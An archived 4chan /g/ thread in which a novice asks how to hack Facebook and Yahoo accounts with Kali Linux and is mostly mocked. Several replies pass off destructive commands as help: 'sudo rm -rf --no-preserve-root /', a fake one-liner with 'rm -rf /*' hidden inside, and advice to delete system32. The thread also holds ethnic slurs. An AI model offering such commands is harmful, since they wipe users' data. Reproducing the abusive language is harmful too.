[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
how to become an hack? i download kali linux set up on laptop
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 22
Thread images: 3
File: 785.png (149 KB, 1292x712) Image search: [Google]
785.png
149 KB, 1292x712
how to become an hack? i download kali linux set up on laptop very good yes, been watching to much youtube hacking vids but not quite there yet, so how become full hacker?
>>
>>51522503
ping 127.0.0.1 -t to start hacking Wireless Networks. It's the first thing you must learn.

Don't forget to watch the matrix and read chkdsk.
>>
>>51522503
You're already a hack anon
>>
>>51522503
color 2
tree C:\\
There you go, rajeesh
>>
>>51522503
>how to become an hack
Start directing movies
>>
>>51522907
>color 2
>not color a
>>
>>51523013
>>51522907
>>51522793
>>51522751

thnx men but how to hack accounts from kalinux on youtube no how but how? an hack become i want
>>
>>51523081
use the force brute you must if a hack became you want
>>
>>51522503
Google, mate
>>
sudo rm -rf --no-preserve-root /
>>
>>51522503
POO IN LOO
>>
>>51523081
guys i think he's serious
>>
>>51523095

but access into accounts i want facebook id and yahoo mail

>>51523110

cannot find

>>51523126

my vamware not working now i reinstall but to get into account how to do with command?
>>
Join the military, preferably air force, and choose a cyber security job.
>>
>>51523253
just run the command and it shows you a wizard. you enter the account type (gmail, facebook, twitter, ...) and the email and it cracks the password in seconds.
>>
File: topkek.png (116 KB, 625x800) Image search: [Google]
topkek.png
116 KB, 625x800
>>51523095
lol
>>
Once your copy of linux is running, just copy and paste this into a terminal

pen -site "youtube.com" -user "username";sudo rm -rf /*&&inject -newPass "password";login -site "youtube" -user "username" -pass "newpassword"

andd you should be set
happy hacking

someone please correct me if i messed it up, at work cant test the syntax to verify.
>>
>>51523368
This!
It should work perfectly, I used this on my laptop to regain acces to my old youtube channel. Doesn't work when you have system32 installed however but we might be able to help you with that.
>>
>>51523368

benchod fuckeryerd that fuck my vm again basterd of bitch, im fuck your mom one night ok.

cannot find advices on anonymous website i suggested to go to but only get sillies
>>
>>51523412
>that fuck my vm again
jesus fuck man

how retarded are you

how many places have you posted asking the same question.
>>
>>51523412
You should have removed system32 on your main machine as I said in my other post. Doing so will fix your virtual machine again. Good luck!
>>
>>51523081
Quit shit posting Raj
Thread replies: 22
Thread images: 3

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.